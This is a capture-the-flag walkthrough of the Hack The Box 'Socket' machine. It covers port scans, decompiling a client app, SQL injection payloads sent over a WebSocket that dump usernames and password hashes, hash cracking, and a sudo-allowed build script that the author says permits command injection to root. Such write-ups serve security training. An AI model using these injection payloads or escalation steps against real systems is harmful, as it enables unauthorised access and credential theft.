In this post, I would like to share a walkthrough of the Socket Machine from Hack the Box


This room will be considered a medium machine on Hack the Box

What will you gain from the Socket machine?


For the user flag, you will need to download the Windows Application which requires our attention especially when we need to analyze the application workflow. We can also use Stews tools to provide us with some information on the potential vulnerability. We should be obtaining a credential when we are playing the WebSocket with SQL Injection.


As for the root flag, you only need to abuse a bash script called build_installer.sh which we should be getting a root shell

Information Gathering on Socket Machine


Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN

┌─[darknite@parrot]─[~/Document/htb/socket]
└──╼ $nmap -sC -sV 10.10.14.206 -oA intial 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-26 09:30 EDT
Nmap scan report for 10.129.193.144
Host is up (0.19s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:a28 (ECDSA)
|_  256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://qreader.htb/
Service Info: Host: qreader.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.85 seconds

We have some information from the Nmap result which we managed to obtain the domain of the website.

┌─[darknite@parrot]─[~/Document/htb/socket]
└──╼ $nmap -p- -sC -sV 10.10.14.206 -oA full
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-26 09:33 EDT
Stats: 0:13:55 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan

5789/tcp open  unknown
| fingerprint-strings: 
|   GenericLines, GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad Request
|     Date: Sun, 26 Mar 2023 13:56:07 GMT
|     Server: Python/3.10 websockets/10.4
|     Content-Length: 77
|     Content-Type: text/plain
|     Connection: close
|     Failed to open a WebSocket connection: did not receive a valid HTTP request.
|   Help, SSLSessionReq: 
|     HTTP/1.1 400 Bad Request
|     Date: Sun, 26 Mar 2023 13:56:24 GMT
|     Server: Python/3.10 websockets/10.4
|     Content-Length: 77
|     Content-Type: text/plain
|     Connection: close
|     Failed to open a WebSocket connection: did not receive a valid HTTP request.
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Date: Sun, 26 Mar 2023 13:56:08 GMT
|     Server: Python/3.10 websockets/10.4
|     Content-Length: 77
|     Content-Type: text/plain
|     Connection: close
|_    Failed to open a WebSocket connection: did not receive a valid HTTP request.

Service Info: Host: qreader.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1451.82 seconds

When we try to run the full port and managed to see a new port that we haven’t seen before. Therefore, let’s access the website interface for now


The website interface shows that we can upload files to read your QR code.


However, we can download the Qreader file on our attacker’s machine and try to unzip it which it will allow us to look into the folder.


As shown above, the file can be read using the python3.9 version


Let’s decompile back the pyc file back to the python file


For that purpose, we will use the uncompyle6 tool to decompile it.


If all requirements are met, we should be able to see the source


However, don’t be worried if we cannot see the source because we have another method to analyze the website vulnerability which we managed to see that it’s vulnerable to Vanilla CSWSH vulnerability

Enumerate the WebSocket with SQL Injection


The source code will look something as shown above.

Disclaimer: I didn’t code this Python code

1) '0.0.3" UNION SELECT group_concat(name),2,3,4 from sqlite_schema-- -'
2) '0.0.3" UNION SELECT sqlite_version(),2,3,4-- -'
3) '0.0.3" UNION SELECT 1,2,3,4-- -'
4) '0.0.3" UNION SELECT group_concat(answered_by),group_concat(answer),3,4 from answers-- -'
5) '0.0.3" UNION SELECT username,password,3,4 from users-- -'

The SQL command above is one that we will be using to obtain the details, especially username and password


The first MySQL command that we found


The second Mysql command


The third mysql command


Fourth mysql command


Last mysql command


At last, we managed to retrieve the hashes and try to crack the hash by using the crackstation


We can also use hashcat to retrieve the password


As a result, we have successfully accessed the machine via SSH service.


We can read the user flag by typing the “cat user.txt” command

Escalate to Root Privileges Access


As usual, we can find the file that we can abuse by running the “sudo -l” command

(remote) tkeller@socket:/home/tkeller$ cat /usr/local/sbin/build-installer.sh
#!/bin/bash
if [ $# -ne 2 ] && [[ $1 != 'cleanup' ]]; then
  /usr/bin/echo "No enough arguments supplied"
  exit 1;
fi

action=$1
name=$2
ext=$(/usr/bin/echo $2 |/usr/bin/awk -F'.' '{ print $(NF) }')

if [[ -L $name ]];then
  /usr/bin/echo 'Symlinks are not allowed'
  exit 1;
fi

if [[ $action == 'build' ]]; then
  if [[ $ext == 'spec' ]] ; then
    /usr/bin/rm -r /opt/shared/build /opt/shared/dist 2>/dev/null
    /home/svc/.local/bin/pyinstaller $name
    /usr/bin/mv ./dist ./build /opt/shared
  else
    echo "Invalid file format"
    exit 1;
  fi
elif [[ $action == 'make' ]]; then
  if [[ $ext == 'py' ]] ; then
    /usr/bin/rm -r /opt/shared/build /opt/shared/dist 2>/dev/null
    /root/.local/bin/pyinstaller -F --name "qreader" $name --specpath /tmp
   /usr/bin/mv ./dist ./build /opt/shared
  else
    echo "Invalid file format"
    exit 1;
  fi
elif [[ $action == 'cleanup' ]]; then
  /usr/bin/rm -r ./build ./dist 2>/dev/null
  /usr/bin/rm -r /opt/shared/build /opt/shared/dist 2>/dev/null
  /usr/bin/rm /tmp/qreader* 2>/dev/null
else
  /usr/bin/echo 'Invalid action'
  exit 1;
fi
if [[ $action == 'build' ]]; then
  if [[ $ext == 'spec' ]] ; then
    /usr/bin/rm -r /opt/shared/build /opt/shared/dist 2>/dev/null
    /home/svc/.local/bin/pyinstaller $name
    /usr/bin/mv ./dist ./build /opt/shared
  else
    echo "Invalid file format"
    exit 1;
  fi

The source code above shows that we can use the command injection to obtain the root shell


We can execute the malicious command above


We can read the root flag by typing the “cat root.txt” command